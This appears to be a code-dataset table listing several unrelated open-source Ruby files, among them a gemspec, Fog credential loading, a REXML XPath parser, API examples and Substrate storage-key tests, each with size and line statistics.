hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
38fedca5cbdd1738ced5e9a20eebd9429592c8d6 | 1,332 | require File.expand_path("../lib/decent_exposure/version", __FILE__)
Gem::Specification.new do |spec|
spec.name = "decent_exposure"
spec.version = DecentExposure::VERSION
spec.authors = ["Pavel Pravosud", "Stephen Caudill"]
spec.email = ["[email protected]"]
spec.summary = "A helper for creating declarative interfaces in controllers"
spec.description = '
DecentExposure helps you program to an interface, rather than an
implementation in your Rails controllers. The fact of the matter is that
sharing state via instance variables in controllers promotes close coupling
with views. DecentExposure gives you a declarative manner of exposing an
interface to the state that controllers contain and thereby decreasing
coupling and improving your testability and overall design.
'
spec.homepage = "https://github.com/hashrocket/decent_exposure"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.test_files = spec.files.grep(/\Aspec\//)
spec.require_path = "lib"
spec.required_ruby_version = "~> 2.0"
spec.add_dependency "activesupport", ">= 4.0"
spec.add_development_dependency "railties", ">= 4.0"
spec.add_development_dependency "actionmailer"
spec.add_development_dependency "rspec-rails", "~> 3.0"
spec.add_development_dependency "standard"
end
| 42.967742 | 79 | 0.749249 |
38adeb59daf05ff3a0c8453648b239a933e23c6e | 74 | class InspectionFinding < ActiveRecord::Base
belongs_to :inspection
end
| 18.5 | 44 | 0.824324 |
7a63a35c92fff9b98995bf88fd23b2fd0e3e3cda | 2,716 | require "yaml"
module Fog
require "fog/core/deprecation"
# Sets the global configuration up from a Hash rather than using background loading from a file
#
# @example
# Fog.credentials = {
# :default => {
# :example_url => "https://example.com/"
# :example_username => "bob",
# :example_password => "obo"
# },
# :production => {
# :example_username => "bob",
# :example_password => "obo"
# }
# }
#
# @return [Hash] The newly assigned credentials
class << self
attr_writer :credentials
end
# Assign a new credential to use from configuration file
#
# @param [String, Symbol] new_credential name of new credential to use
# @return [Symbol] name of the new credential
def self.credential=(new_credential)
@credentials = nil
@credential = new_credential && new_credential.to_sym
end
# This is the named credential from amongst the configuration file being used or +:default+
#
# @note This can be set using the +FOG_CREDENTIAL+ environment variable
#
# @return [Symbol] The credential to use in Fog
def self.credential
@credential ||= (ENV["FOG_CREDENTIAL"] && ENV["FOG_CREDENTIAL"].to_sym) || :default
end
# This returns the path to the configuration file being used globally to look for sets of
# credentials
#
# @note This can be set using the +FOG_RC+ environment variable or defaults to +$HOME/.fog+
#
# @return [String] The path for configuration_file
def self.credentials_path
@credential_path ||= begin
path = ENV["FOG_RC"] || (ENV["HOME"] && File.directory?(ENV["HOME"]) && "~/.fog")
File.expand_path(path) if path
rescue
nil
end
end
# @return [String] The new path for credentials file
def self.credentials_path=(new_credentials_path)
@credentials = nil
@credential_path = new_credentials_path
end
# @return [Hash] The credentials pulled from the configuration file
# @raise [LoadError] Configuration unavailable in configuration file
def self.credentials
@credentials ||= begin
if credentials_path && File.exist?(credentials_path)
credentials = Fog::Core::Utils.prepare_service_settings(YAML.load_file(credentials_path))
(credentials && credentials[credential]) || Fog::Errors.missing_credentials
else
{}
end
end
end
# @deprecated Don't use!
# @param [Object] key
# @return [true] if key == :headers
def self.symbolize_credential?(key)
![:headers].include?(key)
end
# @deprecated Use {Fog::Core::Utils.prepare_service_settings} instead
def self.symbolize_credentials(hash)
Fog::Core::Utils.prepare_service_settings(hash)
end
end
| 30.177778 | 97 | 0.673417 |
5d5c7a99ba589290672ace264d1b7641501e8730 | 55 | DummyView = ActionView::Base.with_empty_template_cache
| 27.5 | 54 | 0.872727 |
21f2cf6b7f9c2b8a282e4b52d6957edb30c3453f | 1,723 | =begin
#TextMagic API
#No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.8
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TextMagic::GetUserDedicatedNumbersPaginatedResponse
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'GetUserDedicatedNumbersPaginatedResponse' do
before do
# run before each test
@instance = TextMagic::GetUserDedicatedNumbersPaginatedResponse.new
end
after do
# run after each test
end
describe 'test an instance of GetUserDedicatedNumbersPaginatedResponse' do
it 'should create an instance of GetUserDedicatedNumbersPaginatedResponse' do
expect(@instance).to be_instance_of(TextMagic::GetUserDedicatedNumbersPaginatedResponse)
end
end
describe 'test attribute "page"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "page_count"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "limit"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "resources"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.716667 | 102 | 0.752176 |
b91f33099a04779150fc0909e78cb48cc06143b5 | 825 | #
# Author:: Salim Alam (<[email protected]>)
# Copyright:: Copyright (c) 2016 Chef, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'logger'
module DepSelector
class Debug
class << self
def log
@logger ||= Logger.new(STDOUT)
end
end
end
end
| 27.5 | 74 | 0.713939 |
1d1f5ba6d638dd495066c19f5782d579fa04ae47 | 2,602 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright:: Copyright 2012, Google Inc. All Rights Reserved.
#
# License:: Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example adds a user to a team by creating an association between the two.
# To determine which teams exist, run get_all_teams.rb. To determine which users
# exist, run get_all_users.rb.
require 'dfp_api'
API_VERSION = :v201505
def create_user_team_associations()
# Get DfpApi instance and load configuration from ~/dfp_api.yml.
dfp = DfpApi::Api.new
# To enable logging of SOAP requests, set the log_level value to 'DEBUG' in
# the configuration file or provide your own logger:
# dfp.logger = Logger.new('dfp_xml.log')
# Get the UserTeamAssociationService.
uta_service = dfp.service(:UserTeamAssociationService, API_VERSION)
# Set the users and team to add them to.
team_id = 'INSERT_TEAM_ID_HERE'.to_i
user_ids = ['INSERT_USER_ID_HERE'.to_i]
# Create an array to store local user team association objects.
associations = user_ids.map do |user_id|
{
:user_id => user_id,
:team_id => team_id
}
end
# Create the user team associations on the server.
return_associations = uta_service.create_user_team_associations(associations)
if return_associations
return_associations.each do |association|
puts ("A user team association between user ID %d and team ID %d was " +
"created.") % [association[:user_id], association[:team_id]]
end
else
raise 'No user team associations were created.'
end
end
if __FILE__ == $0
begin
create_user_team_associations()
# HTTP errors.
rescue AdsCommon::Errors::HttpError => e
puts "HTTP Error: %s" % e
# API errors.
rescue DfpApi::Errors::ApiException => e
puts "Message: %s" % e.message
puts 'Errors:'
e.errors.each_with_index do |error, index|
puts "\tError [%d]:" % (index + 1)
error.each do |field, value|
puts "\t\t%s: %s" % [field, value]
end
end
end
end
| 31.349398 | 80 | 0.686011 |
ab9eca1c58f871aabbff9097fe4d48fefd5fcf5e | 699 | class Chef
class Provider
class MariaChefGem < Chef::Provider::LWRPBase
use_inline_resources if defined?(use_inline_resources)
def whyrun_supported?
true
end
def action_install
converge_by 'install mysql chef_gem and dependencies' do
recipe_eval do
run_context.include_recipe 'build-essential::default'
end
recipe_eval do
run_context.include_recipe 'mariadb::client'
end
chef_gem 'mysql2' do
action :install
end
end
end
def action_remove
chef_gem 'mysql2' do
action :remove
end
end
end
end
end
| 20.558824 | 65 | 0.589413 |
28d030710ab87094883a77f1413a90fd159ebfbf | 25,988 | Sketchup::require 'geores_src/geores_import/geores_rexml/namespace.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/xmltokens.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/attribute.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/syncenumerator.rb'
Sketchup::require 'geores_src/geores_import/geores_rexml/geores_parsers/xpathparser.rb'
class Object
def dclone
clone
end
end
class Symbol
def dclone ; self ; end
end
class Fixnum
def dclone ; self ; end
end
class Float
def dclone ; self ; end
end
class Array
def dclone
klone = self.clone
klone.clear
self.each{|v| klone << v.dclone}
klone
end
end
module REXML
# You don't want to use this class. Really. Use XPath, which is a wrapper
# for this class. Believe me. You don't want to poke around in here.
# There is strange, dark magic at work in this code. Beware. Go back! Go
# back while you still can!
class XPathParser
include XMLTokens
LITERAL = /^'([^']*)'|^"([^"]*)"/u
def initialize( )
@parser = REXML::Parsers::XPathParser.new
@namespaces = nil
@variables = {}
end
def namespaces=( namespaces={} )
Functions::namespace_context = namespaces
@namespaces = namespaces
end
def variables=( vars={} )
Functions::variables = vars
@variables = vars
end
def parse path, nodeset
#puts "#"*40
path_stack = @parser.parse( path )
#puts "PARSE: #{path} => #{path_stack.inspect}"
#puts "PARSE: nodeset = #{nodeset.inspect}"
match( path_stack, nodeset )
end
def get_first path, nodeset
#puts "#"*40
path_stack = @parser.parse( path )
#puts "PARSE: #{path} => #{path_stack.inspect}"
#puts "PARSE: nodeset = #{nodeset.inspect}"
first( path_stack, nodeset )
end
def predicate path, nodeset
path_stack = @parser.parse( path )
expr( path_stack, nodeset )
end
def []=( variable_name, value )
@variables[ variable_name ] = value
end
# Performs a depth-first (document order) XPath search, and returns the
# first match. This is the fastest, lightest way to return a single result.
#
# FIXME: This method is incomplete!
def first( path_stack, node )
#puts "#{depth}) Entering match( #{path.inspect}, #{tree.inspect} )"
return nil if path.size == 0
case path[0]
when :document
# do nothing
return first( path[1..-1], node )
when :child
for c in node.children
#puts "#{depth}) CHILD checking #{name(c)}"
r = first( path[1..-1], c )
#puts "#{depth}) RETURNING #{r.inspect}" if r
return r if r
end
when :qname
name = path[2]
#puts "#{depth}) QNAME #{name(tree)} == #{name} (path => #{path.size})"
if node.name == name
#puts "#{depth}) RETURNING #{tree.inspect}" if path.size == 3
return node if path.size == 3
return first( path[3..-1], node )
else
return nil
end
when :descendant_or_self
r = first( path[1..-1], node )
return r if r
for c in node.children
r = first( path, c )
return r if r
end
when :node
return first( path[1..-1], node )
when :any
return first( path[1..-1], node )
end
return nil
end
def match( path_stack, nodeset )
#puts "MATCH: path_stack = #{path_stack.inspect}"
#puts "MATCH: nodeset = #{nodeset.inspect}"
r = expr( path_stack, nodeset )
#puts "MAIN EXPR => #{r.inspect}"
r
end
private
# Returns a String namespace for a node, given a prefix
# The rules are:
#
# 1. Use the supplied namespace mapping first.
# 2. If no mapping was supplied, use the context node to look up the namespace
def get_namespace( node, prefix )
if @namespaces
return @namespaces[prefix] || ''
else
return node.namespace( prefix ) if node.node_type == :element
return ''
end
end
# Expr takes a stack of path elements and a set of nodes (either a Parent
# or an Array and returns an Array of matching nodes
ALL = [ :attribute, :element, :text, :processing_instruction, :comment ]
ELEMENTS = [ :element ]
def expr( path_stack, nodeset, context=nil )
#puts "#"*15
#puts "In expr with #{path_stack.inspect}"
#puts "Returning" if path_stack.length == 0 || nodeset.length == 0
node_types = ELEMENTS
return nodeset if path_stack.length == 0 || nodeset.length == 0
while path_stack.length > 0
#puts "#"*5
#puts "Path stack = #{path_stack.inspect}"
#puts "Nodeset is #{nodeset.inspect}"
if nodeset.length == 0
path_stack.clear
return []
end
case (op = path_stack.shift)
when :document
nodeset = [ nodeset[0].root_node ]
#puts ":document, nodeset = #{nodeset.inspect}"
when :qname
#puts "IN QNAME"
prefix = path_stack.shift
name = path_stack.shift
nodeset.delete_if do |node|
# FIXME: This DOUBLES the time XPath searches take
ns = get_namespace( node, prefix )
#puts "NS = #{ns.inspect}"
#puts "node.node_type == :element => #{node.node_type == :element}"
if node.node_type == :element
#puts "node.name == #{name} => #{node.name == name}"
if node.name == name
#puts "node.namespace == #{ns.inspect} => #{node.namespace == ns}"
end
end
!(node.node_type == :element and
node.name == name and
node.namespace == ns )
end
node_types = ELEMENTS
when :any
#puts "ANY 1: nodeset = #{nodeset.inspect}"
#puts "ANY 1: node_types = #{node_types.inspect}"
nodeset.delete_if { |node| !node_types.include?(node.node_type) }
#puts "ANY 2: nodeset = #{nodeset.inspect}"
when :self
# This space left intentionally blank
when :processing_instruction
target = path_stack.shift
nodeset.delete_if do |node|
(node.node_type != :processing_instruction) or
( target!='' and ( node.target != target ) )
end
when :text
nodeset.delete_if { |node| node.node_type != :text }
when :comment
nodeset.delete_if { |node| node.node_type != :comment }
when :node
# This space left intentionally blank
node_types = ALL
when :child
new_nodeset = []
nt = nil
for node in nodeset
nt = node.node_type
new_nodeset += node.children if nt == :element or nt == :document
end
nodeset = new_nodeset
node_types = ELEMENTS
when :literal
return path_stack.shift
when :attribute
new_nodeset = []
case path_stack.shift
when :qname
prefix = path_stack.shift
name = path_stack.shift
for element in nodeset
if element.node_type == :element
#puts "Element name = #{element.name}"
#puts "get_namespace( #{element.inspect}, #{prefix} ) = #{get_namespace(element, prefix)}"
attrib = element.attribute( name, get_namespace(element, prefix) )
#puts "attrib = #{attrib.inspect}"
new_nodeset << attrib if attrib
end
end
when :any
#puts "ANY"
for element in nodeset
if element.node_type == :element
new_nodeset += element.attributes.to_a
end
end
end
nodeset = new_nodeset
when :parent
#puts "PARENT 1: nodeset = #{nodeset}"
nodeset = nodeset.collect{|n| n.parent}.compact
#nodeset = expr(path_stack.dclone, nodeset.collect{|n| n.parent}.compact)
#puts "PARENT 2: nodeset = #{nodeset.inspect}"
node_types = ELEMENTS
when :ancestor
new_nodeset = []
for node in nodeset
while node.parent
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :ancestor_or_self
new_nodeset = []
for node in nodeset
if node.node_type == :element
new_nodeset << node
while ( node.parent )
node = node.parent
new_nodeset << node unless new_nodeset.include? node
end
end
end
nodeset = new_nodeset
node_types = ELEMENTS
when :predicate
new_nodeset = []
subcontext = { :size => nodeset.size }
pred = path_stack.shift
nodeset.each_with_index { |node, index|
subcontext[ :node ] = node
#puts "PREDICATE SETTING CONTEXT INDEX TO #{index+1}"
subcontext[ :index ] = index+1
pc = pred.dclone
#puts "#{node.hash}) Recursing with #{pred.inspect} and [#{node.inspect}]"
result = expr( pc, [node], subcontext )
result = result[0] if result.kind_of? Array and result.length == 1
#puts "#{node.hash}) Result = #{result.inspect} (#{result.class.name})"
if result.kind_of? Numeric
#puts "Adding node #{node.inspect}" if result == (index+1)
new_nodeset << node if result == (index+1)
elsif result.instance_of? Array
if result.size > 0 and result.inject(false) {|k,s| s or k}
#puts "Adding node #{node.inspect}" if result.size > 0
new_nodeset << node if result.size > 0
end
else
#puts "Adding node #{node.inspect}" if result
new_nodeset << node if result
end
}
#puts "New nodeset = #{new_nodeset.inspect}"
#puts "Path_stack = #{path_stack.inspect}"
nodeset = new_nodeset
=begin
predicate = path_stack.shift
ns = nodeset.clone
result = expr( predicate, ns )
#puts "Result = #{result.inspect} (#{result.class.name})"
#puts "nodeset = #{nodeset.inspect}"
if result.kind_of? Array
nodeset = result.zip(ns).collect{|m,n| n if m}.compact
else
nodeset = result ? nodeset : []
end
#puts "Outgoing NS = #{nodeset.inspect}"
=end
when :descendant_or_self
rv = descendant_or_self( path_stack, nodeset )
path_stack.clear
nodeset = rv
node_types = ELEMENTS
when :descendant
results = []
nt = nil
for node in nodeset
nt = node.node_type
results += expr( path_stack.dclone.unshift( :descendant_or_self ),
node.children ) if nt == :element or nt == :document
end
nodeset = results
node_types = ELEMENTS
when :following_sibling
#puts "FOLLOWING_SIBLING 1: nodeset = #{nodeset}"
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
following_siblings = all_siblings[ current_index+1 .. -1 ]
results += expr( path_stack.dclone, following_siblings )
end
#puts "FOLLOWING_SIBLING 2: nodeset = #{nodeset}"
nodeset = results
when :preceding_sibling
results = []
nodeset.each do |node|
next if node.parent.nil?
all_siblings = node.parent.children
current_index = all_siblings.index( node )
preceding_siblings = all_siblings[ 0, current_index ].reverse
results += preceding_siblings
end
nodeset = results
node_types = ELEMENTS
when :preceding
new_nodeset = []
for node in nodeset
new_nodeset += preceding( node )
end
#puts "NEW NODESET => #{new_nodeset.inspect}"
nodeset = new_nodeset
node_types = ELEMENTS
when :following
new_nodeset = []
for node in nodeset
new_nodeset += following( node )
end
nodeset = new_nodeset
node_types = ELEMENTS
when :namespace
#puts "In :namespace"
new_nodeset = []
prefix = path_stack.shift
for node in nodeset
if (node.node_type == :element or node.node_type == :attribute)
if @namespaces
namespaces = @namespaces
elsif (node.node_type == :element)
namespaces = node.namespaces
else
namespaces = node.element.namesapces
end
#puts "Namespaces = #{namespaces.inspect}"
#puts "Prefix = #{prefix.inspect}"
#puts "Node.namespace = #{node.namespace}"
if (node.namespace == namespaces[prefix])
new_nodeset << node
end
end
end
nodeset = new_nodeset
when :variable
var_name = path_stack.shift
return @variables[ var_name ]
# :and, :or, :eq, :neq, :lt, :lteq, :gt, :gteq
# TODO: Special case for :or and :and -- not evaluate the right
# operand if the left alone determines result (i.e. is true for
# :or and false for :and).
when :eq, :neq, :lt, :lteq, :gt, :gteq, :and, :or
left = expr( path_stack.shift, nodeset.dup, context )
#puts "LEFT => #{left.inspect} (#{left.class.name})"
right = expr( path_stack.shift, nodeset.dup, context )
#puts "RIGHT => #{right.inspect} (#{right.class.name})"
res = equality_relational_compare( left, op, right )
#puts "RES => #{res.inspect}"
return res
when :and
left = expr( path_stack.shift, nodeset.dup, context )
#puts "LEFT => #{left.inspect} (#{left.class.name})"
if left == false || left.nil? || !left.inject(false) {|a,b| a | b}
return []
end
right = expr( path_stack.shift, nodeset.dup, context )
#puts "RIGHT => #{right.inspect} (#{right.class.name})"
res = equality_relational_compare( left, op, right )
#puts "RES => #{res.inspect}"
return res
when :div
left = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context)).to_f
return (left / right)
when :mod
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left % right)
when :mult
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left * right)
when :plus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left + right)
when :minus
left = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
right = Functions::number(expr(path_stack.shift, nodeset, context )).to_f
return (left - right)
when :union
left = expr( path_stack.shift, nodeset, context )
right = expr( path_stack.shift, nodeset, context )
return (left | right)
when :neg
res = expr( path_stack, nodeset, context )
return -(res.to_f)
when :not
when :function
func_name = path_stack.shift.tr('-','_')
arguments = path_stack.shift
#puts "FUNCTION 0: #{func_name}(#{arguments.collect{|a|a.inspect}.join(', ')})"
subcontext = context ? nil : { :size => nodeset.size }
res = []
cont = context
nodeset.each_with_index { |n, i|
if subcontext
subcontext[:node] = n
subcontext[:index] = i
cont = subcontext
end
arg_clone = arguments.dclone
args = arg_clone.collect { |arg|
#puts "FUNCTION 1: Calling expr( #{arg.inspect}, [#{n.inspect}] )"
expr( arg, [n], cont )
}
#puts "FUNCTION 2: #{func_name}(#{args.collect{|a|a.inspect}.join(', ')})"
Functions.context = cont
res << Functions.send( func_name, *args )
#puts "FUNCTION 3: #{res[-1].inspect}"
}
return res
end
end # while
#puts "EXPR returning #{nodeset.inspect}"
return nodeset
end
##########################################################
# FIXME
# The next two methods are BAD MOJO!
# This is my achilles heel. If anybody thinks of a better
# way of doing this, be my guest. This really sucks, but
# it is a wonder it works at all.
# ########################################################
def descendant_or_self( path_stack, nodeset )
rs = []
#puts "#"*80
#puts "PATH_STACK = #{path_stack.inspect}"
#puts "NODESET = #{nodeset.collect{|n|n.inspect}.inspect}"
d_o_s( path_stack, nodeset, rs )
#puts "RS = #{rs.collect{|n|n.inspect}.inspect}"
document_order(rs.flatten.compact)
#rs.flatten.compact
end
def d_o_s( p, ns, r )
#puts "IN DOS with #{ns.inspect}; ALREADY HAVE #{r.inspect}"
nt = nil
ns.each_index do |i|
n = ns[i]
#puts "P => #{p.inspect}"
x = expr( p.dclone, [ n ] )
nt = n.node_type
d_o_s( p, n.children, x ) if nt == :element or nt == :document and n.children.size > 0
r.concat(x) if x.size > 0
end
end
# Reorders an array of nodes so that they are in document order
# It tries to do this efficiently.
#
# FIXME: I need to get rid of this, but the issue is that most of the XPath
# interpreter functions as a filter, which means that we lose context going
# in and out of function calls. If I knew what the index of the nodes was,
# I wouldn't have to do this. Maybe add a document IDX for each node?
# Problems with mutable documents. Or, rewrite everything.
def document_order( array_of_nodes )
new_arry = []
array_of_nodes.each { |node|
node_idx = []
np = node.node_type == :attribute ? node.element : node
while np.parent and np.parent.node_type == :element
node_idx << np.parent.index( np )
np = np.parent
end
new_arry << [ node_idx.reverse, node ]
}
#puts "new_arry = #{new_arry.inspect}"
new_arry.sort{ |s1, s2| s1[0] <=> s2[0] }.collect{ |s| s[1] }
end
def recurse( nodeset, &block )
for node in nodeset
yield node
recurse( node, &block ) if node.node_type == :element
end
end
# Builds a nodeset of all of the preceding nodes of the supplied node,
# in reverse document order
# preceding:: includes every element in the document that precedes this node,
# except for ancestors
def preceding( node )
#puts "IN PRECEDING"
ancestors = []
p = node.parent
while p
ancestors << p
p = p.parent
end
acc = []
p = preceding_node_of( node )
#puts "P = #{p.inspect}"
while p
if ancestors.include? p
ancestors.delete(p)
else
acc << p
end
p = preceding_node_of( p )
#puts "P = #{p.inspect}"
end
acc
end
def preceding_node_of( node )
#puts "NODE: #{node.inspect}"
#puts "PREVIOUS NODE: #{node.previous_sibling_node.inspect}"
#puts "PARENT NODE: #{node.parent}"
psn = node.previous_sibling_node
if psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
return node.parent
#psn = preceding_node_of( node.parent )
end
while psn and psn.kind_of? Element and psn.children.size > 0
psn = psn.children[-1]
end
psn
end
def following( node )
#puts "IN PRECEDING"
acc = []
p = next_sibling_node( node )
#puts "P = #{p.inspect}"
while p
acc << p
p = following_node_of( p )
#puts "P = #{p.inspect}"
end
acc
end
def following_node_of( node )
#puts "NODE: #{node.inspect}"
#puts "PREVIOUS NODE: #{node.previous_sibling_node.inspect}"
#puts "PARENT NODE: #{node.parent}"
if node.kind_of? Element and node.children.size > 0
return node.children[0]
end
return next_sibling_node(node)
end
def next_sibling_node(node)
psn = node.next_sibling_node
while psn.nil?
if node.parent.nil? or node.parent.class == Document
return nil
end
node = node.parent
psn = node.next_sibling_node
#puts "psn = #{psn.inspect}"
end
return psn
end
def norm b
case b
when true, false
return b
when 'true', 'false'
return Functions::boolean( b )
when /^\d+(\.\d+)?$/
return Functions::number( b )
else
return Functions::string( b )
end
end
def equality_relational_compare( set1, op, set2 )
#puts "EQ_REL_COMP(#{set1.inspect} #{op.inspect} #{set2.inspect})"
if set1.kind_of? Array and set2.kind_of? Array
#puts "#{set1.size} & #{set2.size}"
if set1.size == 1 and set2.size == 1
set1 = set1[0]
set2 = set2[0]
elsif set1.size == 0 or set2.size == 0
nd = set1.size==0 ? set2 : set1
rv = nd.collect { |il| compare( il, op, nil ) }
#puts "RV = #{rv.inspect}"
return rv
else
res = []
enum = SyncEnumerator.new( set1, set2 ).each { |i1, i2|
#puts "i1 = #{i1.inspect} (#{i1.class.name})"
#puts "i2 = #{i2.inspect} (#{i2.class.name})"
i1 = norm( i1 )
i2 = norm( i2 )
res << compare( i1, op, i2 )
}
return res
end
end
#puts "EQ_REL_COMP: #{set1.inspect} (#{set1.class.name}), #{op}, #{set2.inspect} (#{set2.class.name})"
#puts "COMPARING VALUES"
# If one is nodeset and other is number, compare number to each item
# in nodeset s.t. number op number(string(item))
# If one is nodeset and other is string, compare string to each item
# in nodeset s.t. string op string(item)
# If one is nodeset and other is boolean, compare boolean to each item
# in nodeset s.t. boolean op boolean(item)
if set1.kind_of? Array or set2.kind_of? Array
#puts "ISA ARRAY"
if set1.kind_of? Array
a = set1
b = set2
else
a = set2
b = set1
end
case b
when true, false
return a.collect {|v| compare( Functions::boolean(v), op, b ) }
when Numeric
return a.collect {|v| compare( Functions::number(v), op, b )}
when /^\d+(\.\d+)?$/
b = Functions::number( b )
#puts "B = #{b.inspect}"
return a.collect {|v| compare( Functions::number(v), op, b )}
else
#puts "Functions::string( #{b}(#{b.class.name}) ) = #{Functions::string(b)}"
b = Functions::string( b )
return a.collect { |v| compare( Functions::string(v), op, b ) }
end
else
# If neither is nodeset,
# If op is = or !=
# If either boolean, convert to boolean
# If either number, convert to number
# Else, convert to string
# Else
# Convert both to numbers and compare
s1 = set1.to_s
s2 = set2.to_s
#puts "EQ_REL_COMP: #{set1}=>#{s1}, #{set2}=>#{s2}"
if s1 == 'true' or s1 == 'false' or s2 == 'true' or s2 == 'false'
#puts "Functions::boolean(#{set1})=>#{Functions::boolean(set1)}"
#puts "Functions::boolean(#{set2})=>#{Functions::boolean(set2)}"
set1 = Functions::boolean( set1 )
set2 = Functions::boolean( set2 )
else
if op == :eq or op == :neq
if s1 =~ /^\d+(\.\d+)?$/ or s2 =~ /^\d+(\.\d+)?$/
set1 = Functions::number( s1 )
set2 = Functions::number( s2 )
else
set1 = Functions::string( set1 )
set2 = Functions::string( set2 )
end
else
set1 = Functions::number( set1 )
set2 = Functions::number( set2 )
end
end
#puts "EQ_REL_COMP: #{set1} #{op} #{set2}"
#puts ">>> #{compare( set1, op, set2 )}"
return compare( set1, op, set2 )
end
return false
end
def compare a, op, b
#puts "COMPARE #{a.inspect}(#{a.class.name}) #{op} #{b.inspect}(#{b.class.name})"
case op
when :eq
a == b
when :neq
a != b
when :lt
a < b
when :lteq
a <= b
when :gt
a > b
when :gteq
a >= b
when :and
a and b
when :or
a or b
else
false
end
end
end
end
| 32.771753 | 106 | 0.542443 |
331f5a633840a71136ee2a1354f0f3d59ba8cffd | 2,985 | require "scale"
require_relative "./ffi_helper.rb"
def assert_storage_key_for_value(module_name, storage_name, expectation)
m = u8_array_to_pointer module_name.bytes
s = u8_array_to_pointer storage_name.bytes
e = u8_array_to_pointer expectation.hex_to_bytes
Rust.assert_storage_key_for_value(m, m.size, s, s.size, e, e.size)
end
def assert_storage_key_for_map_black2128concat(module_name, storage_name, param, expectation)
m = u8_array_to_pointer module_name.bytes
s = u8_array_to_pointer storage_name.bytes
p = u8_array_to_pointer param.encode.hex_to_bytes
e = u8_array_to_pointer expectation.hex_to_bytes
Rust.assert_storage_key_for_map_black2128concat(
m, m.size,
s, s.size,
p, p.size,
e, e.size
)
end
describe SubstrateClient::Helper do
it "can generate correct storage_key for storage value" do
module_name = 'Sudo'
storage_name = 'Key'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name)
assert_storage_key_for_value(module_name, storage_name, storage_key)
end
it "can generate a correct storage_key for storage map" do
module_name = 'ModuleAbc'
storage_name = 'Map1'
param = Scale::Types::U32.new(1)
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'blake2_128_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d41128328853a72189ae4f290a9869a054e225ad82c12285b5d4551f88e8f6e7eb52b8101000000")
# assert_storage_key_for_map_black2128concat(module_name, storage_name, param, storage_key)
storage_name = 'Map2'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'twox64_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283a4a396b3ec8979c619cf216662faa9915153cb1f00942ff401000000")
storage_name = 'Map3'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param], 'identity')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d4112834f13c9117b595c775448f894b5b0516c01000000")
end
it "can generate a correct storage_key for storage doublemap" do
module_name = 'ModuleAbc'
storage_name = 'DoubleMap1'
param1 = Scale::Types::U32.new(1)
param2 = Scale::Types::U32.new(2)
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param1, param2], 'blake2_128_concat', 'blake2_128_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283c63c595452a3c75489ef352677ad51fad82c12285b5d4551f88e8f6e7eb52b8101000000754faa9acf0378f8c3543d9f132d85bc02000000")
storage_name = 'DoubleMap2'
storage_key = SubstrateClient::Helper.generate_storage_key(module_name, storage_name, [param1, param2], 'blake2_128_concat', 'twox64_concat')
expect(storage_key).to eq("0x4ee617ba653a1b87095c394f5d411283fdf2e24b59506516f72546464dd82f88d82c12285b5d4551f88e8f6e7eb52b81010000009eb2dcce60f37a2702000000")
end
end
| 45.923077 | 179 | 0.80268 |
7a1365a007c6e4cd6cd280a1ef49874eaf25ed4c | 4,155 | #
# Cookbook Name:: selinux
# Recipe:: default
#
# Copyright 2011, Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
